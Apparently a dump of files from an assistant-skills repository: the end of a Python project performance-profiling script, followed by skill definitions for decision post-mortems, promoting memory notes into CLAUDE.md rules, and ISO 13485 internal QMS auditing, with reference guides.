dev_deps = data.get("devDependencies", {})
counts["node_dependencies"] = len(deps) + len(dev_deps)
except Exception:
pass
requirements = root / "requirements.txt"
if requirements.exists():
lines = [ln.strip() for ln in requirements.read_text(encoding="utf-8", errors="ignore").splitlines()]
counts["python_dependencies"] = sum(1 for ln in lines if ln and not ln.startswith("#"))
go_mod = root / "go.mod"
if go_mod.exists():
lines = go_mod.read_text(encoding="utf-8", errors="ignore").splitlines()
in_require_block = False
go_count = 0
for ln in lines:
s = ln.strip()
if s.startswith("require ("):
in_require_block = True
continue
if in_require_block and s == ")":
in_require_block = False
continue
if in_require_block and s and not s.startswith("//"):
go_count += 1
elif s.startswith("require ") and not s.endswith("("):
go_count += 1
counts["go_dependencies"] = go_count
return counts
def bundle_indicators(root: Path) -> Dict[str, object]:
indicators = {
"build_dirs_present": [],
"bundle_like_files": 0,
"estimated_bundle_weight": 0.0,
}
for d in ["dist", "build", ".next", "out"]:
if (root / d).exists():
indicators["build_dirs_present"].append(d)
bundle_files = 0
weight = 0.0
for path in iter_files(root):
ext = path.suffix.lower()
if ext in EXT_WEIGHTS:
bundle_files += 1
size_kb = path.stat().st_size / 1024.0
weight += size_kb * EXT_WEIGHTS[ext]
indicators["bundle_like_files"] = bundle_files
indicators["estimated_bundle_weight"] = round(weight, 2)
return indicators
def format_size(num_bytes: int) -> str:
units = ["B", "KB", "MB", "GB"]
value = float(num_bytes)
for unit in units:
if value < 1024.0 or unit == units[-1]:
return f"{value:.1f}{unit}"
value /= 1024.0
return f"{num_bytes}B"
def build_report(root: Path, threshold_bytes: int) -> Dict[str, object]:
large = get_large_files(root, threshold_bytes)
deps = count_dependencies(root)
bundles = bundle_indicators(root)
return {
"root": str(root),
"large_file_threshold_bytes": threshold_bytes,
"large_files": large,
"dependency_counts": deps,
"bundle_indicators": bundles,
}
def print_text(report: Dict[str, object]) -> None:
print("Performance Profile Report")
print(f"Root: {report['root']}")
print(f"Large-file threshold: {format_size(int(report['large_file_threshold_bytes']))}")
print("")
dep_counts = report["dependency_counts"]
print("Dependency Counts")
print(f"- Node: {dep_counts['node_dependencies']}")
print(f"- Python: {dep_counts['python_dependencies']}")
print(f"- Go: {dep_counts['go_dependencies']}")
print("")
bundle = report["bundle_indicators"]
print("Bundle Indicators")
print(f"- Build directories present: {', '.join(bundle['build_dirs_present']) or 'none'}")
print(f"- Bundle-like files: {bundle['bundle_like_files']}")
print(f"- Estimated weighted bundle size: {bundle['estimated_bundle_weight']} KB")
print("")
print("Large Files")
large_files = report["large_files"]
if not large_files:
print("- None above threshold")
else:
for rel_path, size in large_files[:20]:
print(f"- {rel_path}: {format_size(size)}")
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="Analyze a project directory for common performance risk indicators."
)
parser.add_argument("path", help="Directory to analyze")
parser.add_argument(
"--large-file-threshold-kb",
type=int,
default=512,
help="Threshold in KB for reporting large files (default: 512)",
)
parser.add_argument(
"--json",
action="store_true",
help="Print JSON output instead of text",
)
return parser.parse_args()
def main() -> int:
args = parse_args()
root = Path(args.path).expanduser().resolve()
if not root.exists() or not root.is_dir():
raise SystemExit(f"Path is not a directory: {root}")
threshold = max(1, args.large_file_threshold_kb) * 1024
report = build_report(root, threshold)
if args.json:
print(json.dumps(report, indent=2))
else:
print_text(report)
return 0
if __name__ == "__main__":
raise SystemExit(main())
Nhìn lại trung thực một quyết định đã thực thi, chấm theo giả định ban đầu và ý kiến phản biện, khép vòng sprint chiến lược.
---
name: "post-mortem"
description: "/cs:post-mortem <decision> — Honest retrospective on an executed decision, scored against original assumptions and dissent. Closes the strategic sprint loop."
---
# /cs:post-mortem — Honest Retrospective
**Command:** `/cs:post-mortem <decision-path>`
Closes the strategic sprint loop. Scores a decision against the success and kill criteria written **before** the decision (not retro-fitted) and revisits the preserved dissent. This is the rigor that compounds over time.
## Pipeline Position
```
/cs:office-hours → /cs:brief → /cs:boardroom → /cs:decide → /cs:execute → /cs:post-mortem
↑ you are here
```
## When to Run
- At the 90-day checkpoint (auto-scheduled by `/cs:decide`)
- When a kill criterion triggers
- After a major decision is reversed
- Quarterly on all decisions of the past quarter
## Inputs
- The decision record (output of `/cs:decide`)
- The execution plan (output of `/cs:execute`)
- Actual outcomes (metrics, events, customer signals)
## Output: Post-Mortem Record
Saved to `~/.claude/postmortems/YYYY-MM-DD-<slug>.md`:
```markdown
# Post-Mortem: <decision title>
**Decision date:** YYYY-MM-DD
**Post-mortem date:** YYYY-MM-DD
**Status:** WIN / PARTIAL / LOSS / MIXED
## Outcome Scoring (against pre-committed criteria)
| Success Criterion | Threshold | Actual | Met? |
|---|---|---|---|
| <metric 1> | <threshold> | <actual> | ✅ / ❌ |
| <metric 2> | <threshold> | <actual> | ✅ / ❌ |
| Kill Criterion | Threshold | Actual | Triggered? |
|---|---|---|---|
| <metric> | <threshold> | <actual> | ✅ / ❌ |
**Overall:** WIN / PARTIAL / LOSS / MIXED
## What We Got Right
- <factor 1>
- <factor 2>
## What We Got Wrong
- <factor 1>
- <factor 2>
## Preserved Dissent — Revisited
[Original dissent from the boardroom memo, scored:]
- **<dissenter>:** <original concern>
- **Did it materialize?** YES / NO / PARTIAL
- **Cost if YES:** <quantified impact>
- **Lesson:** <one sentence>
## Assumption Audit
[Original brief's assumptions, scored:]
- **Assumption 1:** <text>
- **Held?** YES / NO / PARTIAL
- **Why:** <explanation>
## Process Lessons
- **Phase 2 isolation worked?** YES / NO
- **Devil's advocate concerns played out?** YES / NO / PARTIAL
- **Cadence was right?** YES / TOO LOOSE / TOO TIGHT
## Forward Actions
- [ ] <change to operating system or routing logic>
- [ ] <new decision to make based on this learning>
- [ ] <update company-context.md>
## Status
- WIN → archive, log lesson
- LOSS → schedule follow-up boardroom: `/cs:brief` for the next call
```
## Why Pre-Committed Criteria Matter
The biggest temptation in post-mortems is retroactive justification: "we always knew X, that's why we did Y." Pre-committed criteria, signed at `/cs:decide` time, eliminate that move. The numbers either matched or they didn't.
## Why Revisit Dissent
The dissent column from `/cs:boardroom` is the single most useful piece of organizational memory. Most of the time, the dissenter was directionally right. Revisiting and scoring it builds calibration over years.
## Routing
- `/cs:brief` — if the post-mortem surfaces a new decision
- `/cs:freeze` — if the post-mortem reveals a process gap that needs cooldown enforcement
- Updates to company-context.md via `cs-onboard`
## Related
- Skill: [`decision-logger`](../../../skills/decision-logger/SKILL.md)
- Agent: [`cs-chief-of-staff`](../../agents/cs-chief-of-staff.md)
- Sibling: [`/em:postmortem`](../../../executive-mentor/skills/postmortem/SKILL.md) — adversarial single-decision post-mortem
---
**Version:** 1.0.0
Nâng một mẫu đã được chứng minh từ bộ nhớ tự động (MEMORY.md) lên CLAUDE.md hoặc .claude/rules/ để áp dụng lâu dài.
---
name: "promote"
description: "Graduate a proven pattern from auto-memory (MEMORY.md) to CLAUDE.md or .claude/rules/ for permanent enforcement."
---
# /si:promote — Graduate Learnings to Rules
Moves a proven pattern from Claude's auto-memory into the project's rule system, where it becomes an enforced instruction rather than a background note.
## Usage
```
/si:promote <pattern description> # Auto-detect best target
/si:promote <pattern> --target claude.md # Promote to CLAUDE.md
/si:promote <pattern> --target rules/testing.md # Promote to scoped rule
/si:promote <pattern> --target rules/api.md --paths "src/api/**/*.ts" # Scoped with paths
```
## Workflow
### Step 1: Understand the pattern
Parse the user's description. If vague, ask one clarifying question:
- "What specific behavior should Claude follow?"
- "Does this apply to all files or specific paths?"
### Step 2: Find the pattern in auto-memory
```bash
# Search MEMORY.md for related entries
MEMORY_DIR="$HOME/.claude/projects/$(pwd | sed 's|/|%2F|g; s|%2F|/|; s|^/||')/memory"
grep -ni "<keywords>" "$MEMORY_DIR/MEMORY.md"
```
Show the matching entries and confirm they're what the user means.
### Step 3: Determine the right target
| Pattern scope | Target | Example |
|---|---|---|
| Applies to entire project | `./CLAUDE.md` | "Use pnpm, not npm" |
| Applies to specific file types | `.claude/rules/<topic>.md` | "API handlers need validation" |
| Applies to all your projects | `~/.claude/CLAUDE.md` | "Prefer explicit error handling" |
If the user didn't specify a target, recommend one based on scope.
### Step 4: Distill into a concise rule
Transform the learning from auto-memory's note format into CLAUDE.md's instruction format:
**Before** (MEMORY.md — descriptive):
> The project uses pnpm workspaces. When I tried npm install it failed. The lock file is pnpm-lock.yaml. Must use pnpm install for dependencies.
**After** (CLAUDE.md — prescriptive):
```markdown
## Build & Dependencies
- Package manager: pnpm (not npm). Use `pnpm install`.
```
**Rules for distillation:**
- One line per rule when possible
- Imperative voice ("Use X", "Always Y", "Never Z")
- Include the command or example, not just the concept
- No backstory — just the instruction
### Step 5: Write to target
**For CLAUDE.md:**
1. Read existing CLAUDE.md
2. Find the appropriate section (or create one)
3. Append the new rule under the right heading
4. If file would exceed 200 lines, suggest using `.claude/rules/` instead
**For `.claude/rules/`:**
1. Create the file if it doesn't exist
2. Add YAML frontmatter with `paths` if scoped
3. Write the rule content
```markdown
---
paths:
- "src/api/**/*.ts"
- "tests/api/**/*"
---
# API Development Rules
- All endpoints must validate input with Zod schemas
- Use `ApiError` class for error responses (not raw Error)
- Include OpenAPI JSDoc comments on handler functions
```
### Step 6: Clean up auto-memory
After promoting, remove or mark the original entry in MEMORY.md:
```bash
# Show what will be removed
grep -n "<pattern>" "$MEMORY_DIR/MEMORY.md"
```
Ask the user to confirm removal. Then edit MEMORY.md to remove the promoted entry. This frees space for new learnings.
### Step 7: Confirm
```
✅ Promoted to {{target}}
Rule: "{{distilled rule}}"
Source: MEMORY.md line {{n}} (removed)
MEMORY.md: {{lines}}/200 lines remaining
The pattern is now an enforced instruction. Claude will follow it in all future sessions.
```
## Promotion Decision Guide
### Promote when:
- Pattern appeared 3+ times in auto-memory
- You corrected Claude about it more than once
- It's a project convention that any contributor should know
- It prevents a recurring mistake
### Don't promote when:
- It's a one-time debugging note (leave in auto-memory)
- It's session-specific context (session memory handles this)
- It might change soon (e.g., during a migration)
- It's already covered by existing rules
### CLAUDE.md vs .claude/rules/
| Use CLAUDE.md for | Use .claude/rules/ for |
|---|---|
| Global project rules | File-type-specific patterns |
| Build commands | Testing conventions |
| Architecture decisions | API design rules |
| Team conventions | Framework-specific gotchas |
## Tips
- Keep CLAUDE.md under 200 lines — use rules/ for overflow
- One rule per line is easier to maintain than paragraphs
- Include the concrete command, not just the concept
- Review promoted rules quarterly — remove what's no longer relevant
Đánh giá nội bộ ISO 13485 cho QMS thiết bị y tế: lập kế hoạch, thực hiện, phân loại điểm không phù hợp và xác minh CAPA.
---
name: "qms-audit-expert"
description: ISO 13485 internal audit expertise for medical device QMS. Covers audit planning, execution, nonconformity classification, and CAPA verification. Use for internal audit planning, audit execution, finding classification, external audit preparation, or audit program management.
triggers:
- ISO 13485 audit
- internal audit
- QMS audit
- audit planning
- nonconformity classification
- CAPA verification
- audit checklist
- audit finding
- external audit prep
- audit schedule
---
# QMS Audit Expert
ISO 13485 internal audit methodology for medical device quality management systems.
---
## Table of Contents
- [Audit Planning Workflow](#audit-planning-workflow)
- [Audit Execution](#audit-execution)
- [Nonconformity Management](#nonconformity-management)
- [External Audit Preparation](#external-audit-preparation)
- [Reference Documentation](#reference-documentation)
- [Tools](#tools)
---
## Audit Planning Workflow
Plan risk-based internal audit program:
1. List all QMS processes requiring audit
2. Assign risk level to each process (High/Medium/Low)
3. Review previous audit findings and trends
4. Determine audit frequency by risk level
5. Assign qualified auditors (verify independence)
6. Create annual audit schedule
7. Communicate schedule to process owners
8. **Validation:** All ISO 13485 clauses covered within cycle
### Risk-Based Audit Frequency
| Risk Level | Frequency | Criteria |
|------------|-----------|----------|
| High | Quarterly | Design control, CAPA, production validation |
| Medium | Semi-annual | Purchasing, training, document control |
| Low | Annual | Infrastructure, management review (if stable) |
### Audit Scope by Clause
| Clause | Process | Focus Areas |
|--------|---------|-------------|
| 4.2 | Document Control | Document approval, distribution, obsolete control |
| 5.6 | Management Review | Inputs complete, decisions documented, actions tracked |
| 6.2 | Training | Competency defined, records complete, effectiveness verified |
| 7.3 | Design Control | Inputs, reviews, V&V, transfer, changes |
| 7.4 | Purchasing | Supplier evaluation, incoming inspection |
| 7.5 | Production | Work instructions, process validation, DHR |
| 7.6 | Calibration | Equipment list, calibration status, out-of-tolerance |
| 8.2.2 | Internal Audit | Schedule compliance, auditor independence |
| 8.3 | NC Product | Identification, segregation, disposition |
| 8.5 | CAPA | Root cause, implementation, effectiveness |
### Auditor Independence
Verify auditor independence before assignment:
- [ ] Auditor not responsible for area being audited
- [ ] No direct reporting relationship to auditee
- [ ] Not involved in recent activities under audit
- [ ] Documented qualification for audit scope
---
## Audit Execution
Conduct systematic internal audit:
1. Prepare audit plan (scope, criteria, schedule)
2. Review relevant documentation before audit
3. Conduct opening meeting with auditee
4. Collect evidence (records, interviews, observation)
5. Classify findings (Major/Minor/Observation)
6. Conduct closing meeting with preliminary findings
7. Prepare audit report within 5 business days
8. **Validation:** All scope items covered, findings supported by evidence
### Evidence Collection
| Method | Use For | Documentation |
|--------|---------|---------------|
| Document review | Procedures, records | Document number, version, date |
| Interview | Process understanding | Interviewee name, role, summary |
| Observation | Actual practice | What, where, when observed |
| Record trace | Process flow | Record IDs, dates, linkage |
### Audit Questions by Clause
**Document Control (4.2):**
- Show me the document master list
- How do you control obsolete documents?
- Show me evidence of document change approval
**Design Control (7.3):**
- Show me the Design History File for [product]
- Who participates in design reviews?
- Show me design input to output traceability
**CAPA (8.5):**
- Show me the CAPA log with open items
- How do you determine root cause?
- Show me effectiveness verification records
See `references/iso13485-audit-guide.md` for complete question sets.
### Finding Documentation
Document each finding with:
```
Requirement: [Specific ISO 13485 clause or procedure]
Evidence: [What was observed, reviewed, or heard]
Gap: [How evidence fails to meet requirement]
```
**Example:**
```
Requirement: ISO 13485:2016 Clause 7.6 requires calibration
at specified intervals.
Evidence: Calibration records for pH meter (EQ-042) show
last calibration 2024-01-15. Calibration interval is
12 months. Today is 2025-03-20.
Gap: Equipment is 2 months overdue for calibration,
representing a gap in calibration program execution.
```
---
## Nonconformity Management
Classify and manage audit findings:
1. Evaluate finding against classification criteria
2. Assign severity (Major/Minor/Observation)
3. Document finding with objective evidence
4. Communicate to process owner
5. Initiate CAPA for Major/Minor findings
6. Track to closure
7. Verify effectiveness at follow-up
8. **Validation:** Finding closed only after effective CAPA
### Classification Criteria
| Category | Definition | CAPA Required | Timeline |
|----------|------------|---------------|----------|
| Major | Systematic failure or absence of element | Yes | 30 days |
| Minor | Isolated lapse or partial implementation | Recommended | 60 days |
| Observation | Improvement opportunity | Optional | As appropriate |
### Classification Decision
```
Is required element absent or failed?
├── Yes → Systematic (multiple instances)? → MAJOR
│ └── No → Could affect product safety? → MAJOR
│ └── No → MINOR
└── No → Deviation from procedure?
├── Yes → Recurring? → MAJOR
│ └── No → MINOR
└── No → Improvement opportunity? → OBSERVATION
```
### CAPA Integration
| Finding Severity | CAPA Depth | Verification |
|------------------|------------|--------------|
| Major | Full root cause analysis (5-Why, Fishbone) | Next audit or within 6 months |
| Minor | Immediate cause identification | Next scheduled audit |
| Observation | Not required | Noted at next audit |
See `references/nonconformity-classification.md` for detailed guidance.
---
## External Audit Preparation
Prepare for certification body or regulatory audit:
1. Complete all scheduled internal audits
2. Verify all findings closed with effective CAPA
3. Review documentation for currency and accuracy
4. Conduct management review with audit as input
5. Prepare facility and personnel
6. Conduct mock audit (full scope)
7. Brief personnel on audit protocol
8. **Validation:** Mock audit findings addressed before external audit
### Pre-Audit Readiness Checklist
**Documentation:**
- [ ] Quality Manual current
- [ ] Procedures reflect actual practice
- [ ] Records complete and retrievable
- [ ] Previous audit findings closed
**Personnel:**
- [ ] Key personnel available during audit
- [ ] Subject matter experts identified
- [ ] Personnel briefed on audit protocol
- [ ] Escorts assigned
**Facility:**
- [ ] Work areas organized
- [ ] Documents at point of use current
- [ ] Equipment calibration status visible
- [ ] Nonconforming product segregated
### Mock Audit Protocol
1. Use external auditor or qualified internal auditor
2. Cover full scope of upcoming external audit
3. Simulate actual audit conditions (timing, formality)
4. Document findings as for real audit
5. Address all Major and Minor findings before external audit
6. Brief management on readiness status
---
## Reference Documentation
### ISO 13485 Audit Guide
`references/iso13485-audit-guide.md` contains:
- Clause-by-clause audit methodology
- Sample audit questions for each clause
- Evidence collection requirements
- Common nonconformities by clause
- Finding severity classification
### Nonconformity Classification
`references/nonconformity-classification.md` contains:
- Severity classification criteria and decision tree
- Impact vs. occurrence matrix
- CAPA integration requirements
- Finding documentation templates
- Closure requirements by severity
---
## Tools
### Audit Schedule Optimizer
```bash
# Generate optimized audit schedule
python scripts/audit_schedule_optimizer.py --processes processes.json
# Interactive mode
python scripts/audit_schedule_optimizer.py --interactive
# JSON output for integration
python scripts/audit_schedule_optimizer.py --processes processes.json --output json
```
Generates risk-based audit schedule considering:
- Process risk level
- Previous findings
- Days since last audit
- Criticality scores
**Output includes:**
- Prioritized audit schedule
- Quarterly distribution
- Overdue audit alerts
- Resource recommendations
### Sample Process Input
```json
{
"processes": [
{
"name": "Design Control",
"iso_clause": "7.3",
"risk_level": "HIGH",
"last_audit_date": "2024-06-15",
"previous_findings": 2
},
{
"name": "Document Control",
"iso_clause": "4.2",
"risk_level": "MEDIUM",
"last_audit_date": "2024-09-01",
"previous_findings": 0
}
]
}
```
---
## Audit Program Metrics
Track audit program effectiveness:
| Metric | Target | Measurement |
|--------|--------|-------------|
| Schedule compliance | >90% | Audits completed on time |
| Finding closure rate | >95% | Findings closed by due date |
| Repeat findings | <10% | Same finding in consecutive audits |
| CAPA effectiveness | >90% | Verified effective at follow-up |
| Auditor utilization | 4 days/month | Audit days per qualified auditor |
FILE:references/iso13485-audit-guide.md
# ISO 13485 Audit Guide
Clause-by-clause audit methodology with sample questions and common findings.
---
## Table of Contents
- [Audit Approach](#audit-approach)
- [Clause 4: Quality Management System](#clause-4-quality-management-system)
- [Clause 5: Management Responsibility](#clause-5-management-responsibility)
- [Clause 6: Resource Management](#clause-6-resource-management)
- [Clause 7: Product Realization](#clause-7-product-realization)
- [Clause 8: Measurement and Improvement](#clause-8-measurement-and-improvement)
- [Common Nonconformities](#common-nonconformities)
---
## Audit Approach
### Risk-Based Audit Planning
Prioritize audit focus based on:
| Risk Level | Audit Frequency | Scope Depth |
|------------|-----------------|-------------|
| High | Quarterly | Full clause review |
| Medium | Semi-annual | Targeted review |
| Low | Annual | Sampling-based |
### Evidence Collection Methods
| Method | Best For | Examples |
|--------|----------|----------|
| Document review | Procedures, records | SOPs, DHF, batch records |
| Interview | Process understanding | Operators, supervisors |
| Observation | Actual practice | Production, calibration |
| Tracing | Process flow | Order to delivery |
---
## Clause 4: Quality Management System
### 4.1 General Requirements
**Audit Questions:**
- Show me documentation of your QMS scope and exclusions
- How do you identify processes needed for the QMS?
- Show me evidence of outsourced process control
**Evidence to Review:**
- [ ] Quality Manual or QMS description
- [ ] Process interaction diagram
- [ ] Outsourced process agreements
**Common Findings:**
- Scope exclusions not justified
- Outsourced processes not controlled
- Process interactions not defined
### 4.2 Documentation Requirements
**4.2.1-4.2.2 Quality Manual and Documents**
**Audit Questions:**
- Where is your documented quality policy?
- Show me the procedure for document control
- How do you ensure documents are current at point of use?
**Evidence to Review:**
- [ ] Quality Manual
- [ ] Document master list
- [ ] Sample of controlled documents
**4.2.4 Control of Records**
**Audit Questions:**
- What is your record retention policy?
- Show me the procedure for record storage and protection
- How do you ensure record legibility and retrievability?
**Evidence to Review:**
- [ ] Record control procedure
- [ ] Retention schedule
- [ ] Sample record retrieval test
**Common Findings:**
- Obsolete documents in use
- Records not legible or retrievable
- Retention periods not defined for all record types
---
## Clause 5: Management Responsibility
### 5.1-5.2 Management Commitment and Customer Focus
**Audit Questions:**
- How does top management demonstrate commitment to QMS?
- Show me evidence of customer requirement determination
- How are regulatory requirements communicated?
**Evidence to Review:**
- [ ] Quality policy communication
- [ ] Management review minutes
- [ ] Customer feedback records
### 5.4 Planning
**Audit Questions:**
- Where are your quality objectives documented?
- Show me the plan for achieving quality objectives
- How do you maintain QMS integrity during changes?
**Evidence to Review:**
- [ ] Quality objectives (measurable, time-bound)
- [ ] Quality planning documentation
- [ ] Change management records
### 5.5 Responsibility and Authority
**Audit Questions:**
- Where are responsibilities and authorities defined?
- Who is the management representative?
- How is QMS performance communicated to top management?
**Evidence to Review:**
- [ ] Organization chart
- [ ] Job descriptions with QMS responsibilities
- [ ] Management representative appointment
### 5.6 Management Review
**Audit Questions:**
- Show me management review records from last 12 months
- What inputs are included in management review?
- What decisions and actions resulted?
**Required Review Inputs:**
- [ ] Audit results
- [ ] Customer feedback (including complaints)
- [ ] Process performance and product conformity
- [ ] CAPA status
- [ ] Changes affecting QMS
- [ ] Recommendations for improvement
- [ ] New/revised regulatory requirements
**Common Findings:**
- Management review not conducted at planned intervals
- Required inputs missing
- Action items not tracked to completion
---
## Clause 6: Resource Management
### 6.1-6.2 Human Resources
**Audit Questions:**
- How do you determine competency requirements?
- Show me training records for personnel affecting quality
- How do you evaluate training effectiveness?
**Evidence to Review:**
- [ ] Competency requirements by role
- [ ] Training records
- [ ] Effectiveness evaluations
### 6.3-6.4 Infrastructure and Work Environment
**Audit Questions:**
- How do you determine infrastructure requirements?
- Show me maintenance records for critical equipment
- How is work environment controlled for product conformity?
**Evidence to Review:**
- [ ] Equipment list with maintenance schedules
- [ ] Environmental monitoring records
- [ ] Contamination control procedures (if applicable)
**Common Findings:**
- Training effectiveness not evaluated
- Preventive maintenance not performed on schedule
- Environmental conditions not monitored
---
## Clause 7: Product Realization
### 7.1 Planning of Product Realization
**Audit Questions:**
- Show me the quality plan for a recent product
- How do you determine verification and validation activities?
- What records are required to demonstrate conformity?
**Evidence to Review:**
- [ ] Quality plan or project plan
- [ ] Risk management integration
- [ ] Required records defined
### 7.2 Customer-Related Processes
**Audit Questions:**
- How do you determine customer requirements?
- Show me the contract review process
- How do you handle customer communications?
**Evidence to Review:**
- [ ] Contract/order review records
- [ ] Customer requirement documentation
- [ ] Communication records
### 7.3 Design and Development
**Audit Questions (per phase):**
| Phase | Key Questions |
|-------|---------------|
| Planning | Show me design plan with stages, reviews, responsibilities |
| Inputs | How are regulatory requirements identified? |
| Outputs | Show me design outputs addressing inputs |
| Review | Who participated in design reviews? |
| Verification | Show me verification activities and results |
| Validation | Show me validation under actual use conditions |
| Transfer | How was design transferred to production? |
| Changes | Show me design change control records |
**Evidence to Review:**
- [ ] Design History File (DHF)
- [ ] Design review records with participants
- [ ] Verification/validation protocols and reports
- [ ] Design change requests
### 7.4 Purchasing
**Audit Questions:**
- How do you evaluate and select suppliers?
- Show me approved supplier list with evaluation criteria
- How do you verify purchased product?
**Evidence to Review:**
- [ ] Supplier evaluation procedure
- [ ] Approved supplier list
- [ ] Incoming inspection records
- [ ] Supplier audit records
### 7.5 Production and Service Provision
**Audit Questions:**
- Show me work instructions for production
- How are special processes validated?
- Show me traceability records for a product lot
**Evidence to Review:**
- [ ] Production work instructions
- [ ] Process validation records
- [ ] Device history records (DHR)
- [ ] Traceability records
### 7.6 Control of Monitoring and Measuring Equipment
**Audit Questions:**
- Show me calibration records for measuring equipment
- How do you handle out-of-tolerance conditions?
- How is software used for monitoring validated?
**Evidence to Review:**
- [ ] Equipment calibration records
- [ ] Calibration procedure
- [ ] Out-of-tolerance investigation records
**Common Findings:**
- Design inputs not completely addressed in outputs
- Supplier evaluations not performed or documented
- Process validation not maintained after changes
- Calibration overdue
---
## Clause 8: Measurement and Improvement
### 8.2.1 Feedback
**Audit Questions:**
- How do you collect customer feedback?
- Show me complaint handling records
- How is feedback data used for improvement?
**Evidence to Review:**
- [ ] Complaint procedure
- [ ] Complaint log with trending
- [ ] Feedback to design/production
### 8.2.2 Internal Audit
**Audit Questions:**
- Show me the internal audit schedule
- How do you ensure auditor independence?
- Show me audit records and follow-up actions
**Evidence to Review:**
- [ ] Audit program/schedule
- [ ] Auditor qualification records
- [ ] Audit reports and findings
- [ ] CAPA records from audits
### 8.2.3-8.2.4 Monitoring and Measurement
**Audit Questions:**
- How do you monitor process performance?
- Show me product acceptance records
- What happens when acceptance criteria not met?
**Evidence to Review:**
- [ ] Process monitoring data
- [ ] Inspection records
- [ ] Nonconforming product records
### 8.3 Control of Nonconforming Product
**Audit Questions:**
- Show me the procedure for nonconforming product
- How do you prevent unintended use of nonconforming product?
- Who authorizes concessions/deviations?
**Evidence to Review:**
- [ ] NC product procedure
- [ ] NC product records
- [ ] Concession authorizations
### 8.4 Analysis of Data
**Audit Questions:**
- What data do you analyze for QMS effectiveness?
- Show me trend analysis for complaints, NC, CAPA
- How does data drive improvement?
**Evidence to Review:**
- [ ] Data analysis reports
- [ ] Trend charts
- [ ] Management review inputs
### 8.5 CAPA
**Audit Questions:**
- Show me the CAPA procedure
- How do you determine root cause?
- Show me CAPA effectiveness verification
**Evidence to Review:**
- [ ] CAPA procedure
- [ ] Open/closed CAPA log
- [ ] Root cause analysis records
- [ ] Effectiveness verification records
**Common Findings:**
- Complaint trending not performed
- CAPA not initiated for recurring issues
- Root cause analysis superficial
- Effectiveness verification not documented
---
## Common Nonconformities
### Top 10 ISO 13485 Audit Findings
| Rank | Clause | Finding |
|------|--------|---------|
| 1 | 7.3 | Design inputs not traceable to outputs |
| 2 | 8.5 | CAPA effectiveness not verified |
| 3 | 4.2.4 | Records not retrievable or legible |
| 4 | 7.4 | Supplier evaluation not documented |
| 5 | 6.2 | Training effectiveness not evaluated |
| 6 | 7.5.2 | Process validation not maintained |
| 7 | 8.2.2 | Internal audits not covering all clauses |
| 8 | 5.6 | Management review inputs incomplete |
| 9 | 7.6 | Calibration records incomplete |
| 10 | 8.3 | NC product control inadequate |
### Finding Severity Classification
| Severity | Definition | Response Required |
|----------|------------|-------------------|
| Major | Systematic failure, absence of element | CAPA within 30 days |
| Minor | Isolated lapse, partial implementation | Correction within 60 days |
| Observation | Improvement opportunity | Optional action |
FILE:references/iso13485_audit_playbook.md
# ISO 13485:2016 Internal Audit Playbook
This reference answers exactly one decision: **how do we conduct an ISO 13485 QMS internal audit (Clause 8.2.4) that satisfies certification body expectations and supports MDR / FDA QSR alignment?**
Pair with `scripts/audit_schedule_optimizer.py` (this skill) for cadence and with `compliance-os/scripts/audit_simulator.py` for mock-audit preparation.
## When to Use This Playbook
- Annual Clause 8.2.4 internal audit programme
- Pre-stage-1 ISO 13485 certification readiness
- Surveillance audit preparation (year 2 / year 3)
- New medical device introduction (DHF closure audit)
- Post-CAPA closure verification audit
- Bridge audit for FDA QSR / EU MDR alignment
## Key Difference from ISO 27001 Audits
ISO 13485 audits emphasize:
1. **Design controls (Clause 7.3)** — DHF/DMR completeness, design verification + validation evidence, traceability matrix
2. **Process validation (Clause 7.5.6)** — IQ/OQ/PQ for manufacturing + sterilization + cleaning processes
3. **Document control (Clause 4.2)** — strict version control + change control for all controlled documents
4. **CAPA (Clause 8.5.2)** — closed-loop with root cause analysis; "containment / correction / corrective action" distinction
5. **Post-market surveillance (Clause 8.2.1)** — vigilance reporting, customer feedback loop, trend analysis
6. **Risk management (Clause 7.1 + ISO 14971)** — risk file maintained across product lifecycle
ISO 13485 audits are **more prescriptive** than 27001 — auditors expect specific record formats, sign-offs, and traceability that 27001's risk-based approach does not require.
## The 7-Phase Audit Workflow
Same 7-phase structure as ISO 27001 (Plan → Prepare → Open → Field → Close → Report → Track), with these QMS-specific differences:
### Phase 1 Plan — Scope Selection
ISO 13485 organizes clauses by lifecycle activity. Audit fieldwork organizes by:
- **Design controls (Clause 7.3)** — DHF audit per product
- **Production & service provision (Clause 7.5)** — process validation evidence
- **Management responsibility (Clause 5)** — management review records
- **Resource management (Clause 6)** — competence + infrastructure + work environment
- **Measurement, analysis, improvement (Clause 8)** — internal audit programme + CAPA + nonconformity + statistical techniques
3-year rolling coverage: every clause audited at least once, with design + CAPA + post-market in higher rotation due to risk weight.
### Phase 4 Field — QMS-Specific Sampling
For design controls (Clause 7.3) — sample DHFs:
- Stratified by product class (Class I, IIa, IIb, III per MDR; Class I/II/III per FDA)
- For each sampled DHF, verify:
- Design + development plan with stages + reviews defined
- Design inputs traceability to user needs / clinical requirements
- Design outputs verification evidence
- Design validation evidence (clinical evaluation per MDR Annex XIV / 510(k) summary per FDA)
- Design transfer evidence
- Design changes controlled per Clause 7.3.9
- DHF complete and archived
For CAPA (Clause 8.5.2) — sample CAPA records:
- Stratified by source (customer complaint, internal audit, management review, nonconformity)
- For each sampled CAPA, verify:
- Problem statement clear + measurable
- Root cause analysis evidence (5 Why, fishbone, Pareto, FMEA — pick the method)
- Containment + correction + corrective action distinction documented
- Effectiveness verification with evidence (re-test or sample post-implementation)
- Closure approved by appropriate authority
For post-market surveillance (Clause 8.2.1) — sample:
- Customer complaint log + investigation closure
- Vigilance reports (serious incident / FSCA) submitted per applicable regulation
- Trend analysis evidence + management review input
- Post-market clinical follow-up evidence (per MDR for high-risk devices)
## Common Stage 1 / Stage 2 Findings (the patterns)
Based on practitioner reports of common ISO 13485:2016 findings:
1. **Design changes not always controlled per Clause 7.3.9** — emergency changes bypass review
2. **DHF incomplete** — design history files missing one or more required elements
3. **Process validation incomplete or stale** — IQ/OQ/PQ done at original setup, never re-validated
4. **CAPA effectiveness verification missing** — corrective action closed without evidence of effectiveness
5. **Risk management file not updated post-launch** — ISO 14971 risk file frozen at release
6. **Supplier evaluations exist but selection criteria not documented**
7. **Internal audit programme misses some clauses over 3-year cycle**
8. **Management review missing required inputs** (audit results, nonconformity status, customer feedback, etc.)
9. **Training records lack evidence of effectiveness verification**
10. **Document control: obsolete documents accessible in shared drives**
11. **Validation of software used in QMS (per Clause 4.1.6) not performed**
12. **Post-market surveillance plan exists but not executed quarterly**
## MDR 2017/745 + FDA QSR Overlap
ISO 13485 is the foundation for both EU MDR and FDA QSR compliance.
